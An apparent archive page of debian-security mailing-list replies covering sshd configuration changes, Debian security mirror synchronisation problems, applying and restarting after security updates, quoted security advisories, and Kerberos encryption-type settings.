Re: failing ssh login attempts

2018-01-11 Thread Peter Ludikovsky 
Hi!

The change was possibly introduced in the latest release, with the
change from OpenSSH 6.7 to OpenSSH 7.4. OpenSSH 6.8 set the option
UseDNS to default "no":

> *  sshd(8): UseDNS now defaults to 'no'. Configurations that match
>against the client host name (via sshd_config or authorized_keys)
>may need to re-enable it or convert to matching against addresses.

Source: https://www.openssh.com/txt/release-6.8

Regards,
/peter

Am 11.01.2018 um 17:44 schrieb Adam Weremczuk:
> Hi all,
> 
> I recently performed a series of distro upgrades starting from 7.1
> landing at 9.2.
> 
> I have a script running on another 7.1 machine which was connecting fine
> to 7.1 but now it fails after reading authorized_keys file as below:
> 
> 11437 read(4, "from=\"*.example.com\" ssh-rsa XX"..., 4096)
> = 4096
> 11437 getpid()  = 11437
> 11437 socket(AF_UNIX, SOCK_DGRAM|SOCK_CLOEXEC, 0) = 8
> 11437 connect(8, {sa_family=AF_UNIX, sun_path="/dev/log"}, 110) = 0
> 11437 sendto(8, "<38>Jan 11 16:21:32 sshd[11437]: Authentication tried
> for userx with correct key but not from a permitted host
> (host=192.168.XXX.XXX, ip=192.168.XXX.XXX)"..., 147, MSG_NOSIGNAL, NULL,
> 0) = 147
> 11437 close(8)
> 
> So I've tried, -vvv from the source, DEBUG3 on the destination and the
> strace above but can't see anything (such as reversed DNS lookup) apart
> from this single error message.
> 
> Connection is established fine when I replace *.example.com with an IP
> address but that's not very scalable.
> 
> Can somebody possibly put me in the right direction?
> 
> Regards
> Adam Weremczuk
> 



signature.asc
Description: OpenPGP digital signature

Re: What patches/packages to install for specific bugs.

2017-11-29 Thread Peter Ludikovsky 
Hi,

You're mixing up versions, packages, and releases.

> DSA 3503 was fixed in Wheezy version 3.2.73-2+deb7u3

DSA-3503 was fixed in linux version 3.2.73-2+deb7u3

> dsa-3514 was fixed in Wheezy version 2:3.6.6-6+deb7u7

DSA-3514 was fixed in samba version 2:3.6.6-6+deb7u7

>  DSA 3511 was fixed in Wheezy version 1:9.8.4.dfsg.P1-6+nmu2+deb7u10

DSA 3511 was fixed in bind9 version 1:9.8.4.dfsg.P1-6+nmu2+deb7u10

et cetera

> I was told version newer than 3.14 might have fixes for them. But how to 
> compare version 3.2.73 to version :9.8.4.dfsg.P1-6+nmu2+deb7u10?  These 
> version numbers look strange. Thanks.

That's because the release (wheezy) doesn't have those version numbers,
those are the versions of the packages, which, since they're independent
software, progress from different points at different speeds.

> Will below commands apply patch for above bugs? These commands are very 
> helpful though. Thanks.
> 
> $ apt-get update
>  $ apt-get -u upgrade
>  $ apt-get
>  -u dist-upgrade

apt-get update && apt-get upgrade will always apply the most current
security patches as long as you didn't explicitly turn of the security repo.

Regards,
/peter



signature.asc
Description: OpenPGP digital signature

Re: HTTPS needs to be implemented for updating

2016-12-18 Thread Peter Lawler 



On 18/12/16 22:03, Christoph Moench-Tegeder wrote:

second point requires a lot of work
to resolve.

Regards,
Christoph



Monday morning yet-to-be-caffienated thoughts...

I'm going to ignore the 'inconvenience' because I think in this case 
that's a specious argument.


I acknowledge there's a bucketload of work to implement this. Just gets 
me to thinking, staging a switch over may be better. eg, a new apt 
config for https as either 'required' 'desired' and 'off'. This reduces 
the initial workload. Start with the default 'off', then at some future 
release move to 'desired' then 'required'.


Further, I suggest perhaps an automated survey of the major mirrors to 
find which ones already support https may be in order. Perhaps the 
resultant data could be used by the apt-transport-https package for now, 
as well as deciding when the above mentioned switch over might occur.


As I say, decaffienated Monday morning thoughts.

Re: [SECURITY] [DSA 3547-1] imagemagick security update

2016-04-14 Thread Peter Palfrader 
On Wed, 13 Apr 2016, Scott Blaydes wrote:

> >  (3) The scripts that automatically update the security rotation only
> >  check if a server is online and responds to http requests - it
> >  does not check if a mirror is current.

> > Expanding mini-nag[1] to do something about (3) would be nice too.
> 
> Who do we need to talk to about requirements and tasks to help out with
> things like this? I am not a coder, but would love to help out where I can.

mini-nag runs a limited set of nagios checks as configured in the
auto-dns hosts file.

So what we'd need is a nagios check that tells us for a given host
whether its (security) mirror is current.

Stop by in #debian-admin on OFTC if you want to help.

Cheers,
-- 
|  .''`.   ** Debian **
  Peter Palfrader   | : :' :  The  universal
 https://www.palfrader.org/ | `. `'  Operating System
|   `-https://www.debian.org/

Re: [SECURITY] [DSA 3547-1] imagemagick security update

2016-04-14 Thread Peter Palfrader 
On Wed, 13 Apr 2016, Alexander Neilson wrote:

> > (4) The nagios warning was missed in all the noise, and the relevant
> > teams are overworked and busy.
> 
> With mention to the above. Specifically (4). Is there a mailing list /
> group / volunteer place for people interested in helping with network
> operations? 

This is mostly handled by DSA (the debian system admin team) who are all
volunteers and do it in their spare time.  The IRC channel is #debian-admin
on OFTC.  There is a #debian-admin-bots that gets fed the nagios
warnings from https://nagios.debian.org/ (dsa-guest:*).

https://anonscm.debian.org/cgit/mirror/dsa-nagios.git/ has the nagios
config and checks.
-- 
|  .''`.   ** Debian **
  Peter Palfrader   | : :' :  The  universal
 https://www.palfrader.org/ | `. `'  Operating System
|   `-https://www.debian.org/

Re: [SECURITY] [DSA 3547-1] imagemagick security update

2016-04-14 Thread Peter Palfrader 
On Wed, 13 Apr 2016, Henrique de Moraes Holschuh wrote:

> On Wed, Apr 13, 2016, at 02:32, Peter Palfrader wrote:
> > There's also nothing inherently wrong with just having a single address
> > in an RRSet.
> 
> It means a single point of failure for that region:

A desynchronized set isn't any better.

-- 
|  .''`.   ** Debian **
  Peter Palfrader   | : :' :  The  universal
 https://www.palfrader.org/ | `. `'  Operating System
|   `-https://www.debian.org/

Re: [SECURITY] [DSA 3547-1] imagemagick security update

2016-04-12 Thread Peter Palfrader 
On Wed, 13 Apr 2016, Bjoern Nyjorden wrote:

> Given that this is not the first occurrence,

I think it is, actually.  As often is the case in the swiss-cheese
model, here all the holes lined up and the update of this security
mirror was delayed for about two days.

We can identify at least four causal factors.  Probably more, if we
look a bit further.
 (1) The scripts Debian uses to mirror repositories treat the mirroring
 hierarchy as a tree.  The failure of any node or link will cause
 the subtrey(s) under the failed component to not receive updates.
 (2) There is an ongoing network outage between where the australian
 mirror is and its upstream mirror in the US.
 (3) The scripts that automatically update the security rotation only
 check if a server is online and responds to http requests - it
 does not check if a mirror is current.
 (4) The nagios warning was missed in all the noise, and the relevant
 teams are overworked and busy.

>  what options does the Debian
> community have available to prevent this problem from arising again in the
> future?

Fixing (1) would be really nice.  It requires somebody to sit down and
design and implement something better.

Re (2), we are temporarily syncing the .au mirror from a different
machine while the network outage is being traced down by the relevant
NOCs.

Expanding mini-nag[1] to do something about (3) would be nice too.

Cheers,

[1]
  https://anonscm.debian.org/cgit/mirror/dsa-mini-nag.git/tree/
  also see
  https://anonscm.debian.org/cgit/mirror/dsa-auto-dns.git/tree/
-- 
|  .''`.   ** Debian **
  Peter Palfrader   | : :' :  The  universal
 https://www.palfrader.org/ | `. `'  Operating System
|   `-https://www.debian.org/

Re: [SECURITY] [DSA 3547-1] imagemagick security update

2016-04-12 Thread Peter Palfrader 
On Tue, 12 Apr 2016, Michael Stone wrote:

> On Tue, Apr 12, 2016 at 08:56:35PM -0300, Henrique de Moraes Holschuh wrote:
> >Then, maybe we should consider a better way to deal with areas where you
> >get only one choice out of geoip?
> 
> Reach out to the relevant team outlining your issues (e.g., lack of IPv6
> connectivity)? Advising people to hard code security mirrors isn't the right
> solution.

There's also nothing inherently wrong with just having a single address
in an RRSet.

-- 
    |  .''`.   ** Debian **
  Peter Palfrader   | : :' :  The  universal
 https://www.palfrader.org/ | `. `'  Operating System
|   `-https://www.debian.org/

Re: [SECURITY] [DSA 3547-1] imagemagick security update

2016-04-12 Thread Peter Palfrader 
On Tue, 12 Apr 2016, Henrique de Moraes Holschuh wrote:

> We list several mirrors carrying debian security updates in
> https://www.debian.org/mirror/list-full

I think we shouldn't.

> We don't disclose which mirrors are members of the security.debian.org

https://anonscm.debian.org/cgit/mirror/dsa-auto-dns.git/tree/zones/security.debian.org.zone

is the file that the security.d.o zone is generated from.

> Alternate access URIs for several of the security.debian.org pool
> members *do* exist, but that information seems not to be clearly
> displayed anywhere.

They do?  Anything we actually tell people to use?

> A good starting point would be to provide a list of official security
> mirrors (potential members of the security.debian.org pool) that can be
> accessed directly when geo-ip is directing an user to a pool member that
> is stale.

No.  We derotate mirrors regularly for maintenance work.  We don't want
users to pick their security.d.o mirror.

-- 
    |  .''`.   ** Debian **
  Peter Palfrader   | : :' :  The  universal
 https://www.palfrader.org/ | `. `'  Operating System
|   `-https://www.debian.org/

Re: [SECURITY] [DSA 3547-1] imagemagick security update

2016-04-12 Thread Peter Palfrader 
On Tue, 12 Apr 2016, Henrique de Moraes Holschuh wrote:

> On Tue, Apr 12, 2016, at 14:06, Adam D. Barratt wrote:
> > Judging from your e-mail address, I'm going to assume that the answer is 
> > that security.debian.org resolved to 150.203.164.61.
> > 
> > Apparently there was an issue with syncing to that mirror. The sysadmin 
> > team have triggered a manual sync, so things should be up-to-date now.
> 
> Other (leaf ?) .au mirrors also seem to be stale:
> mirror.aarnet.edu.au, mirror.cse.unsw.edu.au
> 
> Either those mirrors are not refreshing at an acceptable rate for
> something that carries /debian-security, or we have a wider issue than a
> single .au mirror missing a push.
> 
> We don't have leaf (non-push) mirrors in the geo-ip list for
> security.debian.org, do we?

We don't support 3rd party security mirrors.  In fact, we actively
discourage them.  Don't use them.

-- 
|  .''`.   ** Debian **
  Peter Palfrader   | : :' :  The  universal
 https://www.palfrader.org/ | `. `'  Operating System
|   `-https://www.debian.org/

Re: Help

2016-03-07 Thread Peter Szabo 

Probably with your mail client? :)

On 2016-03-07 11:51, Zack Piper wrote:

This is the third messgae you've sent of this kind, is there actually
anything you need help with?

Re: [SECURITY] [DSA 3500-1] openssl security update

2016-03-02 Thread Peter Ludikovsky 
Hello,

Take a look at checkrestart [1] from the debian-goodies package. It
tells you which processes are using deleted files, and if possible which
service to restart.


Regards
/peter

[1] http://manpages.debian.org/cgi-bin/man.cgi?query=checkrestart

Am 02.03.2016 um 09:08 schrieb Carsten Aulbert:
> Hi
> 
> brief question for a possible addendum. I believe one should at least
> restart services which are currently using openssl after patching it,
> right, e.g. trying to figure out by lsof -n | grep openssl.
> 
> (or reboot the machine)
> 
> Would it make sense to add that to the DSA 3500-1 page, like for
> DSA-3481[1]?
> 
> Cheers
> 
> Carsten
> 
> [1] "While it is only necessary to ensure that all processes are not
> using the old glibc anymore, it is recommended to reboot the machines
> after applying the security upgrade."
> 
> 
> 



signature.asc
Description: OpenPGP digital signature

Re: [SECURITY] [DSA 3481-1] glibc security update

2016-02-16 Thread Peter Ludikovsky 
Hello,

A question to those more knowledgeable: we're using our own DNS
servers for all lookups, and those do recursive lookup for any
external addresses. Am I right to assume that Bind9 uses it's own
implementation for DNS lookups? Or are those now basically ticking
time bombs?

Regards,
Peter Ludikovsky

Am 16.02.2016 um 15:18 schrieb Salvatore Bonaccorso:
> -
>
> 
Debian Security Advisory DSA-3481-1   secur...@debian.org
> https://www.debian.org/security/   Florian
> Weimer February 16, 2016
> https://www.debian.org/security/faq 
> -
>
>  Package: glibc CVE ID : CVE-2015-7547
> CVE-2015-8776 CVE-2015-8778 CVE-2015-8779 Debian Bug : 812441
> 812445 812455
> 
> Several vulnerabilities have been fixed in the GNU C Library,
> glibc.
> 
> The first vulnerability listed below is considered to have
> critical impact.
> 
> CVE-2015-7547
> 
> The Google Security Team and Red Hat discovered that the glibc host
> name resolver function, getaddrinfo, when processing AF_UNSPEC
> queries (for dual A/ lookups), could mismanage its internal
> buffers, leading to a stack-based buffer overflow and arbitrary
> code execution.  This vulnerability affects most applications which
> perform host name resolution using getaddrinfo, including system
> services.
> 
> CVE-2015-8776
> 
> Adam Nielsen discovered that if an invalid separated time value is
> passed to strftime, the strftime function could crash or leak 
> information.  Applications normally pass only valid time 
> information to strftime; no affected applications are known.
> 
> CVE-2015-8778
> 
> Szabolcs Nagy reported that the rarely-used hcreate and hcreate_r 
> functions did not check the size argument properly, leading to a 
> crash (denial of service) for certain arguments.  No impacted 
> applications are known at this time.
> 
> CVE-2015-8779
> 
> The catopen function contains several unbound stack allocations 
> (stack overflows), causing it the crash the process (denial of 
> service).  No applications where this issue has a security impact 
> are currently known.
> 
> While it is only necessary to ensure that all processes are not
> using the old glibc anymore, it is recommended to reboot the
> machines after applying the security upgrade.
> 
> For the stable distribution (jessie), these problems have been
> fixed in version 2.19-18+deb8u3.
> 
> For the unstable distribution (sid), these problems will be fixed
> in version 2.21-8.
> 
> We recommend that you upgrade your glibc packages.
> 
> Further information about Debian Security Advisories, how to apply 
> these updates to your system and frequently asked questions can be 
> found at: https://www.debian.org/security/
> 
> Mailing list: debian-security-annou...@lists.debian.org
> 



signature.asc
Description: OpenPGP digital signature

Re: Possible out of date mirrors of security.debian.org

2016-01-06 Thread Peter Palfrader 
On Wed, 06 Jan 2016, Alex Brett wrote:

> Grabbing dists/jessie/updates/InRelease from each of these and
> looking at the Date header, two of them appear to be a few days out
> of date:
> InRelease.128.101.240.215:Date: Sun, 03 Jan 2016 20:01:14 UTC
> InRelease.128.31.0.63:Date: Wed, 06 Jan 2016 12:00:52 UTC
> InRelease.128.61.240.73:Date: Wed, 06 Jan 2016 12:00:52 UTC
> InRelease.149.20.20.19:Date: Sun, 03 Jan 2016 20:01:14 UTC
> 
> This has caused me to end up getting some hash sum mismatches by
> grabbing different bits from different IPs etc, so I imagine may be
> causing other people issues as well - is anybody able to resolve
> this?

Thanks for the report.  Fixed now, I think.

Cheers,
-- 
    |  .''`.   ** Debian **
  Peter Palfrader   | : :' :  The  universal
 https://www.palfrader.org/ | `. `'  Operating System
|   `-https://www.debian.org/

Re: [syscom] [SECURITY] [DSA 3375-1] wordpress security update

2015-10-20 Thread Peter Barfuss 

lol again

well I guess it *is* Tuesday

On Mon, 19 Oct 2015, Yves-Alexis Perez wrote:


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

- -
Debian Security Advisory DSA-3375-1   secur...@debian.org
https://www.debian.org/security/Yves-Alexis Perez
October 19, 2015  https://www.debian.org/security/faq
- -

Package: wordpress
CVE ID : CVE-2015-5714 CVE-2015-5715
Debian Bug : 799140

Several vulnerabilities have been fixed in Wordpress, the popular
blogging engine.

CVE-2015-5714

   A cross-site scripting vulnerability when processing shortcode tags
   has been discovered.

   The issue has been fixed by not allowing unclosed HTML elements in
   attributes.

CVE-2015-5715

   A vulnerability has been discovered, allowing users without proper
   permissions to publish private posts and make them sticky.

   The issue has been fixed in the XMLRPC code of Wordpress by not
   allowing private posts to be sticky.

Other issue(s)

  A cross-site scripting vulnerability in user list tables has been
  discovered.

  The issue has been fixed by URL-escaping email addresses in those
  user lists.

For the oldstable distribution (wheezy), these problems will be fixed
in later update.

For the stable distribution (jessie), these problems have been fixed in
version 4.1+dfsg-1+deb8u5.

For the testing distribution (stretch), these problems have been fixed
in version 4.3.1+dfsg-1.

For the unstable distribution (sid), these problems have been fixed in
version 4.3.1+dfsg-1.

We recommend that you upgrade your wordpress packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-BEGIN PGP SIGNATURE-
Version: GnuPG v2

iQEcBAEBCgAGBQJWJU/4AAoJEG3bU/KmdcClwJkH+wbyIKtik3ASrpO/TqULYail
PYwhsEcb58PjFLn5IEqvXXaAi6FANhcllNwennROd5rqNvSZjPNXjkHge+PV64RO
T1rsT4G1MnM2e9CQvRzT3HQP0JC3u/79IvDkGsUfJjMbG/juBcZH4F69VHD/hN8x
rg9ChCEkKjAKAgJIfVU95H4N64iYEsbuRA9d6gJTGqfOw6KcSdNgpeQVRUSn1pjV
ZxabKmG6NFdFaKjo6Ql1FN9yg5bY0u2rNVH7exR+ce19H5N4QY22yqdF5iMNmYb+
3F6UgfTjYXV3PYoyPkoYTbdpcopoWQpCjh/dasjyX0yD06O9F2fW4Ht6UUOxbw8=
=sToZ
-END PGP SIGNATURE-

Re: the calculus of encrypting non-textual data

2014-07-08 Thread Peter Makholm 
Joel Rees  writes:

>>> Did you know that encrypting a picture sometimes results in a picture
>>> that looks like it has been through a random color-permuting filter?
>>
>> Can you proof it?
>
> Memory of coursework in encryption. The professor did some simple
> encryption on uncompressed images and showed how the results tended
> not to hide the things one would want hidden.

Encrypting uncompressed images (bitmaps) in ECB mode tends to reveal a
lot of the structure of the image. There is an example at wikipedia:

  http://en.wikipedia.org/wiki/ECB_mode#Electronic_codebook_.28ECB.29

This just illustrates that using ECB mode is really not any better than
any other form of simple substitution cipher even though the underlying
cipher is considered cryptographically strong.

I don't think 'simple encryptions of uncompressed data' is useful for
anything than an argument for doing it right.

> Then he pointed out that the parts of an image with the most
> information are the parts that are least likely to compress. And he
> pointed out that standard encryption methods tend to be byte-oriented,
> for speed.

I think block ciphers are the most common norm these days with 128 bits
being the nmost popular block size. But even more importantly is an
enhanced focus on how ciphers are applied to the plaintext in ways that
doesn't leak structural information like ECB mode does.

//Makholm


-- 
To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Archive: https://lists.debian.org/87tx6r99xv@vps1.hacking.dk

Re: Debian mirrors and MITM

2014-05-31 Thread Peter Palfrader 
On Fri, 30 May 2014, Joey Hess wrote:

> Alfie John wrote:
> > Taking a look at the Debian mirror list, I see none serving over HTTPS:
> > 
> >   https://www.debian.org/mirror/list
> 
> https://mirrors.kernel.org/debian is the only one I know of.
> 
> It would be good to have a few more, because there are situations where
> debootstrap is used without debian-archive-keyring being available, and
> recent versions of debootstrap try to use https in that situation, to at
> least get the weak CA level of security.

That doesn't buy you anything.  Mirrors, even if you trusted them, don't
use authenticated syncing protocols.

-- 
   |  .''`.   ** Debian **
  Peter Palfrader  | : :' :  The  universal
 http://www.palfrader.org/ | `. `'  Operating System
   |   `-http://www.debian.org/


-- 
To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Archive: https://lists.debian.org/20140531091020.gp20...@anguilla.noreply.org

Re: NSA software in Debian

2014-01-24 Thread Peter Lawler 

On 25/01/14 00:17, Andrew McGlashan wrote:

  It's virtually impossible to know one way or
another, we just have to have some faith and trust (perhaps too much of
one or both).


FWIW, agreed.

To lightly misquote a network engineering mate of mine...

"Not entirely sure why anyone (unquestionably) trusted (any system they 
haven't hand built from the PSU to the VDU) in the first place.

http://cm.bell-labs.com/who/ken/trust.html "

Cheers,

Pete.


--
To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Archive: http://lists.debian.org/52e2c257.2040...@bleeter.id.au

Default root password, username/password

2013-02-04 Thread Peter Lawler 

G'day,
Yes, I know I really should research this a bit more. I beg forgiveness, 
as I've got medical appointments over the next few days and really 
genuinely don't have time right now (for those who were at the 
Bluehackers BoF at Linux.conf.au last week will hopefully understand).


What I'd like to know is about the default root password and default 
username/password pairs on the wheezy installer (for this is the version 
I'm running as my 'introduction' to Debian).


It would seem to me that accepting 'password' and 'rootpassword' for the 
root user during the install phase we'd accept, albeit grudgingly, last 
century and is somewhat unforgivable in the second decade of this one. 
Similarly, that the default user can have the same password as the 
username seems very poor.


As I remarked to others on an IRC channel this morning, it's very handy 
for short lived VM's but that's about the only functionality that I 
believe it's excusable for. Is there a technical reason this 'ability' 
still exists?


Regards,

Peter Lawler.



--
To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Archive: http://lists.debian.org/51103490.1090...@bleeter.id.au

Re: Linux 3.2 in wheezy

2012-01-30 Thread Peter Samuelson 

[Brad Spengler]
> Frankly it makes more sense for me to offer .debs myself than to deal
> with a bureaucracy and non-standard kernel in Debian.  It contains
> who-knows-what extra code, and I doubt anyone looked at any of it to
> see if it allows for some way to leak information I prevent against a
> vanilla kernel, or a way to bypass any other existing protection.

I hope you aren't complaining that the Debian kernel team doesn't
include your patch, and also complaining that Debian kernel team
includes too many patches, in the same email.

Probably that isn't what you tried to say, but that's kinda what it
sounded like.

Peter


-- 
To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Archive: http://lists.debian.org/20120130154049.ga2...@p12n.org

Re: security updates using ftp

2011-08-30 Thread Peter Palfrader 
On Tue, 30 Aug 2011, Nelson Last wrote:

> deb ftp://130.89.149.226/debian squeeze main
> deb ftp://128.31.0.36/debian-security/ squeeze/updates main

Please realize that none of this is guaranteed to remain working.

We might derotate servers from dns when they fall behind or provide
wrong data, or we might retired them or we might repurpose them.

The DNS will point to servers providing the services, but the actual IP
addresses might change (and regularly do).


The proper fix is to kick your networking people so that deb
http://security.d.o and friends work.

-- 
   |  .''`.   ** Debian **
  Peter Palfrader  | : :' :  The  universal
 http://www.palfrader.org/ | `. `'  Operating System
   |   `-http://www.debian.org/


-- 
To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Archive: http://lists.debian.org/20110831060115.gh11...@anguilla.noreply.org

Re: [SECURITY] [DSA 2076-1] New gnupg2 packages fix potential code execution

2010-07-27 Thread Peter Palfrader 
On Tue, 27 Jul 2010, Florian Weimer wrote:

> > For the stable distribution (lenny), this problem has been fixed in
> > version 2.0.9-3.1+lenny1.
> 
> Hi,
> 
> we're investigating an issue with the dissemination of the gnupg2
> security update (and the recent DSA-2075-1 update for xulrunner)
> through the security.debian.org infrastructure.  The updates are
> currently not available.  We hope to resolve that soon.

Looks like all is well now.

Cheers,
-- 
   |  .''`.  ** Debian GNU/Linux **
  Peter Palfrader  | : :' :  The  universal
 http://www.palfrader.org/ | `. `'  Operating System
   |   `-http://www.debian.org/


-- 
To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Archive: http://lists.debian.org/20100727213010.gq9...@anguilla.noreply.org

Re: [SECURITY] [DSA 2006-1] New sudo packages fix several vulnerabilities

2010-03-02 Thread Peter Kringle 
I did receive your email, but I want you to know that I have changed my email 
address to pe...@kringles.org as I am 
moving away from planetnet.org. Please update your address book to reflect 
this.  Thank you.

--
Peter (KØVX)
2CFF D38A 3F42 B215 2098  DA89 26C4 A1B6 3C6E 199F


-- 
To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Archive: http://lists.debian.org/20100302204046.cb7a846...@ns1.planetnet.org

Linux 2.6 update for Etch

2010-02-18 Thread Peter Pentchev 
Hi,

First of all, apologies if this is sent to the wrong list, or if this
information is already available somewhere; also, I'm aware that
security support for Debian Etch ended a couple of days ago.

In the recent DSA-1996-1 for the linux-2.6 package vulnerabilities,
there was the following sentence:

  For the oldstable distribution (etch), these problems, where
  applicable, will be fixed in updates to linux-2.6 and linux-2.6.24.

Now, since we several servers that we are currently in the process of
migrating to Lenny, but the migration will not be complete for at
least several more weeks (and yes, I know this is our own fault :),
I'd just like to ask if there's any timeframe on when the Etch
updates for the linux-2.6 package shall be released - without meaning
to hurry anybody or to be pushy or something; I'm quite aware of
all the work that goes into maintaining security updates across
multiple versions of multiple packages on old distributions,
and the security team has my sincere thanks and condolences for all
the work they have to do so we can sleep soundly :)

Or maybe I'm missing something and the Etch update has already been
released?  But the only updated package I can see at
http://security.debian.org/pool/updates/main/l/ is the "latest" one -
linux-latest-2.6_6etch3; but from what I can see, it builds
the linux-image-2.6-amd64_2.6.18+6etch3 package, which just depends on
linux-image-2.6.18-6-amd64 (the actual kernel), and the actual kernel
at http://security.debian.org/pool/updates/main/l/linux-2.6/ seems
to still be at version 2.6.18.dfsg.1-26etch1 from November 5, 2009.

Am I missing something, or is it just a question of manpower and time?
If the latter, sorry if this mail comes through as pushy - it's really
not meant to be!

Again, thanks to the security team for all their hard work!
Please CC me on replies, since I'm not subscribed to this list.

G'luck,
Peter

-- 
Peter Pentchev  r...@ringlet.netr...@cnsys.bgr...@freebsd.org
PGP key:http://people.FreeBSD.org/~roam/roam.key.asc
Key fingerprint 2EE7 A7A5 17FC 124C F115  C354 651E EFB0 2527 DF13
This sentence contradicts itself - or rather - well, no, actually it doesn't!


pgpdm0i7ILlx5.pgp
Description: PGP signature

running vs. installed kernel (was: rootkit not found by rkhunter)

2009-10-06 Thread Peter Palfrader 
On Mon, 05 Oct 2009, dann frazier wrote:

> On Sun, Oct 04, 2009 at 12:16:14PM -0400, Michael S Gilbert wrote:
> > On Sun, 4 Oct 2009 11:44:52 -0400 Thomas Krichel wrote:
> > >   It looks like the affected machines run older kernels, so 
> > >   I will follow your advice and upgrade. 
> > 
> > i forgot to mention that 'uname -r' won't actually tell you whether you
> > are running the most up-to-date debian kernel.  to do that, look at the
> > output of 'dpkg -l | grep linux-image-$(uname -r)'.
> 
> cat /proc/version is nice because it is the running kernel, and
> includes the package version.

Also, maybe
http://git.debian.org/?p=mirror/dsa-nagios.git;a=blob;f=dsa-nagios-checks/checks/dsa-check-running-kernel;hb=HEAD
might be useful for some.

I don't claim it works in all the cases, or finds every weird
combination out there, but it seems to do a pretty good job of helping
us not forget to reboot systems.

I'm sure the interested parties can butcher it for parts if they don't
want all it does (i.e. maybe not everyone wants the get_avail magic).

Cheers,
weasel
-- 
   |  .''`.  ** Debian GNU/Linux **
  Peter Palfrader  | : :' :  The  universal
 http://www.palfrader.org/ | `. `'  Operating System
   |   `-http://www.debian.org/


-- 
To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org

Re: HEAD's UP: possible 0day SSH exploit in the wild

2009-07-10 Thread Peter Jordan 
Russ Allbery, Fri Jul 10 2009 19:24:52 GMT+0200 (CEST):
> Peter Jordan  writes:
>> Russ Allbery, Fri Jul 10 2009 16:31:14 GMT+0200 (CEST):
> 
> 
>> But for new installations a change is not a bad idea?
> 
> Yeah, for new installations it's generally best to start the master key
> at the strongest supported key type.  MIT 1.7 supports rekeying, though,
> which makes things much simpler.
> 
> 
>> How can i see that the change has worked?
> 
> klist -e will show you the enctypes of the tickets in your cache.  You
> can also check the enctypes of the tickets issued by the KDC in the KDC
> logs, although those are numeric and a bit less easy to understand.
> 

hmmm, although i have set supported enctypes
supported_enctypes = aes256-cts:normal
and restarted kdc nothing seens to have changed.

After calling "kinit" klist -5e show me:
Etype (skey, tkt): Triple DES cbc mode with HMAC/sha1, Triple DES cbc
mode with HMAC/sha1

PJ


-- 
To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org

Re: HEAD's UP: possible 0day SSH exploit in the wild

2009-07-10 Thread Peter Jordan 
Russ Allbery, Fri Jul 10 2009 16:31:14 GMT+0200 (CEST):
> Peter Jordan  writes:
> 
>> Let the option
>>  master_key_type = des3-hmac-sha1
>> as it is?
> 
> Yes.  The master key isn't used on the network and changing it is very
> difficult in lenny.

But for new installations a change is not a bad idea?

> 
>> No change in /etc/krb5.conf required?
> 
> Correct.  Clients will negotiate the strongest available encryption key
> automatically.

How can i see that the change has worked?

> 
>> should i renew all host keys?
> 
> Ideally, yes, since that will get them on AES only.  If you have any
> existing keys that don't have AES keys, you do need to list fallback
> enctypes as supported until you've rekeyed them or you won't be able to
> authenticate to them.
> 

It seems to work without renewing old keys (host/nfs). How can i see
which enctypes the keys have.

btw. if i list the principal for me in kadmin.local there are no values
for Last successful authentication / Last failed authentication and
ailed password attempts although the  EQUIRES_PRE_AUTH Attribute is set:

get_principal peter
Principal: pe...@example.com
[...]
Last successful authentication: [never]
Last failed authentication: [never]
Failed password attempts: 0
Number of keys: 6
Key: vno 1, Triple DES cbc mode with HMAC/sha1, no salt
Key: vno 1, DES cbc mode with CRC-32, no salt
Key: vno 1, DES cbc mode with RSA-MD5, Version 4
Key: vno 1, DES cbc mode with RSA-MD5, Version 5 - No Realm
Key: vno 1, DES cbc mode with RSA-MD5, Version 5 - Realm Only
Key: vno 1, DES cbc mode with RSA-MD5, AFS version 3
Attributes: REQUIRES_PRE_AUTH
Policy: [none]

Do you know what is wrong?

thank you very much!

PJ


-- 
To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org

Re: HEAD's UP: possible 0day SSH exploit in the wild

2009-07-10 Thread Peter Jordan 
Russ Allbery, Fri Jul 10 2009 00:56:57 GMT+0200 (CEST):
> Peter Jordan  writes:
> 
>> btw is it possible to use any kind of one time password mechanism with
>> mit kdc?
> 
> Not without applying custom patches that are rather a hack.  You can,
> however, do PKINIT, which lets you use smart cards that can do X.509
> authentication (some of which are quite inexpensive these days).  We're
> evaluating the DESfire cards for our purposes.
> 

hmmm, that does not solve the problem, when i have to login from a
insecure computer (ie Internet cafe) . I know, you have not connect to
your network from insecure computers, but sometimes you have not the choice.

PJ


-- 
To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org

Re: HEAD's UP: possible 0day SSH exploit in the wild

2009-07-10 Thread Peter Jordan 
Russ Allbery, Fri Jul 10 2009 00:55:42 GMT+0200 (CEST):
> Peter Jordan  writes:
>> Russ Allbery, Thu Jul 09 2009 21:51:50 GMT+0200 (CEST):
> 
> 
> 
> However, if you also have AFS, which I recall that you do, you can't
> turn it off at that level.  You have to leave DES as a supported enctype
> since the AFS service key at present still has to be DES (although we're
> working on that).  In that case, you have to deal with it at creation
> time for each principal.  In other words, when you do addprinc or ktadd
> for everything other than the AFS service key, pass the -e
